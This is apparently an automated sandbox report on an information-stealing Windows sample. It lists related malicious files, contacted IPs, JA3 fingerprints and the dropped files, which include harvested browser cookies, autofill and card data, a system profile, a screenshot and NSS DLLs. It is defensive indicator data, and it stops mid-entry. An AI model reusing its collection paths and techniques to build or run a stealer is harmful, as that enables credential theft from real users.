                                                                                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    SebwAujas5.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    G2BPn4a7o1.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    qOsCIQD1uR.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    NC7bm1PoKj.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    p0FDRanFUE.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    Tt5xbxWwsb.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    37f463bf4616ecd445d4a1937da06e19InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    nY67wl47QZ.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    payment confirmation.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    recital-239880844.xlsGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Unreal.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    BXTOD28N3I.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Kapitu.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    SebwAujas5.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82

                                                                                                    Dropped Files

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    C:\ProgramData\freebl3.dllnY67wl47QZ.exeGet hashmaliciousBrowse
                                                                                                      OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                                                        W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                                                          R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                                                            7XmWGse79x.exeGet hashmaliciousBrowse
                                                                                                              m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                                                                hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                                                                  NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                                                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                                                                      lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                                                        SebwAujas5.exeGet hashmaliciousBrowse
                                                                                                                          nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                                                            cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                                                                              k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                                                                b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                                                                  G2BPn4a7o1.exeGet hashmaliciousBrowse
                                                                                                                                    qOsCIQD1uR.exeGet hashmaliciousBrowse
                                                                                                                                      p0FDRanFUE.exeGet hashmaliciousBrowse
                                                                                                                                        Tt5xbxWwsb.exeGet hashmaliciousBrowse
                                                                                                                                          rJPkGz9DpL.exeGet hashmaliciousBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\d06ed635-68f6-4e9a-955c-4899f5f57b9a0565504142.zip
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):86146
                                                                                                                                            Entropy (8bit):7.988500919143562
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:MivE9ss2LPGQjl0Pb9bKTeZp0Dn2tcnwbHXyqCB0QDO61MeVeazo67q5ronEdubN:Mic9h2SL9b4sp0T2t5HXkF31MyeazoO7
                                                                                                                                            MD5:83F5D295706AD005C33D1C96CE1768F9
                                                                                                                                            SHA1:7283873EDB248AC10553EE0B0D4079B1D8001118
                                                                                                                                            SHA-256:95346A160787AF310B80C02F28BDAED3558EF2774D16C850E0737050D9DDD4D5
                                                                                                                                            SHA-512:F9A64DD49FBE723FE50C3F3BDDD4F42D038259902A96B2E4952FCB891836E51709DA07C084E361CFE04006F206C35538B2EA9FA611946D75403415E945D4DE59
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: PK........4.<S............#.../Autofill/Google Chrome_Default.txtUT....pRa.pRa.pRa..PK........4.<S............#.../Autofill/Google Chrome_Default.txtUT....pRa.pRa.pRaPK........2.<S................/CC/Google Chrome_Default.txtUT....pRa.pRa.pRa..PK........2.<S................/CC/Google Chrome_Default.txtUT....pRa.pRa.pRaPK........2.<S................/Cookies/Edge_Cookies.txtUT....pRa.pRa.pRa..PK........2.<S................/Cookies/Edge_Cookies.txtUT....pRa.pRa.pRaPK........2.<S............".../Cookies/Google Chrome_Default.txtUT....pRa.pRa.pRa-..r.0...5..hK@....<x...R..\ ..2tj...nz6g..I.5L_....y......A....^........"...n.]....YL2..E[_....U...%KY.jv.bTw..#..6......w...@5...H....)..Bp./A<......>........(.)=..B.V.s.s...5.C.Sx~..PK........2.<Sp...........".../Cookies/Google Chrome_Default.txtUT....pRa.pRa.pRaPK........2.<S................/Cookies/IE_Cookies.txtUT....pRa.pRa.pRa..PK........2.<S................/Cookies/IE_Cookies.txtUT....pRa.pRa.pRaPK........2.<S............$.../Do
                                                                                                                                            C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Cookies\Google Chrome_Default.txt
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):218
                                                                                                                                            Entropy (8bit):5.748326181791092
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:PkopYjdfOoX51TbDgivd4YMrd71DLE7XGsTQ4DW:copYxfOop1Tt4YYd7JL8h3i
                                                                                                                                            MD5:0E37A051C705869E8440255E0C5A4D82
                                                                                                                                            SHA1:AEF4B628215185F8FEA4681ECD2F77FF892F6033
                                                                                                                                            SHA-256:4652C43B2F5D51B901F1D6828024918F1E7358B2931CACB5D1B18BD0E4A99A6A
                                                                                                                                            SHA-512:DE12E5F572671107C198E9D3C16FCD02B8212D47A70692C10E7E59EA037CA79BC2B4AB1042810B7D7C37C576FF679DA4C31E0FC85B2B8048B4D7651A26F20BB0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview: .google.com.FALSE./.FALSE.1617283352.NID.204=XlJ-cT9Xg8DDNcFChe-nUGbxxEez8DRPGzgzUdZjP1JdN2YiNhfyRKFYdvFacUiguPGJxNZQxNzSiNVBcKqtq4ja7gbbvS3qQExvrcATH8SyD8dfy7IhIXh65vwy9wvzcYGB8MPR2c8HHGKEWDbc9DczP4qY4Ggc7D8ZFucZfEc..
                                                                                                                                            C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Files\Default.zip
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:Zip archive data (empty)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22
                                                                                                                                            Entropy (8bit):1.0476747992754052
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:pjt/l:Nt
                                                                                                                                            MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                                                                            SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                                                                            SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                                                                            SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview: PK....................
                                                                                                                                            C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\information.txt
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:ISO-8859 text, with very long lines, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12029
                                                                                                                                            Entropy (8bit):5.280931554276703
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:2OIOQ2L6iQgqMlZC0e/s2ipgBdQXRsg8qbNqqN:jxQVxPMzC0Gs2ipgUX2MboqN
                                                                                                                                            MD5:6B6D12801633AF1D905289A595270D52
                                                                                                                                            SHA1:75CC6DD0B756C54BA88C08B61637C65ABD0667F6
                                                                                                                                            SHA-256:239B1734C6C75D56F484D973D28A5AD242F38983986F212E200419F39E0CFB31
                                                                                                                                            SHA-512:FA4C09832DF4B4F57C016388D04E87A0EAD5D13A0285B2BCBF7278021BBB56BF046257AD60F9EAB8BD3A122289ACB6B9FB7E743131E4A0AD9E7F4D2B7673FD2B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: Version: 41....Date: Mon Sep 27 18:33:10 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\Desktop\T6zZFfRLqs.exe ..Work Dir: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5 ....Windows: Windows 10 Pro [x64]..Computer Name: 932923..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 27/9/2021 18:33:10..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [296]..- csrss.exe [388]..- wininit.exe [468]..- csrss.exe [480]..- services.exe [560]..- winlogon.exe [568]..- lsass.exe [588]..- fontdrvhost.exe [688]..- fontdrvhost.exe [696]..- svchost.exe [716]..- svchost.exe [792]..- svchost.ex
                                                                                                                                            C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\screenshot.jpg
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84556
                                                                                                                                            Entropy (8bit):7.8956169781643535
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:Cp7TSq2Dzv0GKZae9Ud+h5EF7hWGiCz753EVWIl1iP/tofdpNkM9OvkQP9BhXI1j:FT3v0G2HK+5ahWGiCREhTyeffyE1oK
                                                                                                                                            MD5:E70E8D509DAD628815E8438AFC383275
                                                                                                                                            SHA1:39E83409B16CA8344521C706C338E674F393AA94
                                                                                                                                            SHA-256:8FFFA619BCC1BBB76A287645CDB1B1EB2B5BC039DCCE7BF937CE678AFD3E379B
                                                                                                                                            SHA-512:7497E77FD4A41CD811CFD3C512210B68FE8E3D2262CFFF979267273A34FB0E4E5B50FCB3BC111DC2EBBC8B2B406A18BC17DB4C9EB0D233AF393DDF9B7D2C1CC8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(..V.5.?......x...1.,,..6.$-......*d.U....yM-}5.....<p...F....$...3..........._.Ug..i..=..^8.Gi5..
                                                                                                                                            C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\temp
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):446464
                                                                                                                                            Entropy (8bit):0.7604971265724939
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:kioiWBBj9oiWBBjN20olG4oNQraFB/JraFB/Q:Gizindo6QLQG
                                                                                                                                            MD5:C10344289448C94CF3F5AE6E3188725E
                                                                                                                                            SHA1:D769BB5C803762A2C0169651D6FC6B1EEE66ABE5
                                                                                                                                            SHA-256:5E0F2B44D04FFC1B5C7ADBB1DA4834517BE805EABDE32B213E6F04B9E87DE852
                                                                                                                                            SHA-512:CE710B9E0EE10792796FA5A04BCAA5A39F24001FA00B510D26B933DB1CFDDF4EDD8E0FA2DD6B8AE3E1959C966CC04FB66BEC3EF003A0FEC94C6CB768792A33E9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\ProgramData\freebl3.dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):334288
                                                                                                                                            Entropy (8bit):6.807000203861606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                                                                                            MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                                                                                            SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                                                                                            SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                                                                                            SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: nY67wl47QZ.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: OfE705GyPZ.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: W7fb1ECIQA.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: R9LbEnIk0s.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: 7XmWGse79x.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: m5W1BZQU4m.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: hHsIHUGICB.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: NOgYb2fHbO.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: VwDvbAowp0.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: lXy3MnXJ83.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: SebwAujas5.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: nxW9yUgdYM.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: cxBR3cCGTw.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: k5THcVgINl.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: b2i2IopgOC.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: G2BPn4a7o1.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: qOsCIQD1uR.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: p0FDRanFUE.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Tt5xbxWwsb.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: rJPkGz9DpL.exe, Detection: malicious, Browse
                                                                                                                                            Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                            C:\ProgramData\mozglue.dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137168
                                                                                                                                            Entropy (8bit):6.78390291752429
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                                                                                            MD5:8F73C08A9660691143661BF7332C3C27
                                                                                                                                            SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                                                                                            SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                                                                                            SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                            C:\ProgramData\msvcp140.dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):440120
                                                                                                                                            Entropy (8bit):6.652844702578311
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                                                            MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                                                            SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                                                            SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                                                            SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                            C:\ProgramData\nss3.dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1246160
                                                                                                                                            Entropy (8bit):6.765536416094505
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                                                                                            MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                                                                                            SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                                                                                            SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                                                                                            SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\ProgramData\softokn3.dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):144848
                                                                                                                                            Entropy (8bit):6.539750563864442
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                                                                            MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                                                                            SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                                                                            SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                                                                            SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\ProgramData\vcruntime140.dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):83784
                                                                                                                                            Entropy (8bit):6.890347360270656
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                            MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                            SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                            SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                            SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137168
                                                                                                                                            Entropy (8bit):6.78390291752429
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                                                                                            MD5:8F73C08A9660691143661BF7332C3C27
                                                                                                                                            SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                                                                                            SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                                                                                            SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll
                                                                                                                                            Process:C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):144848
                                                                                                                                            Entropy (8bit):6.539750563864442
                                                                                                                                            Encrypted:false
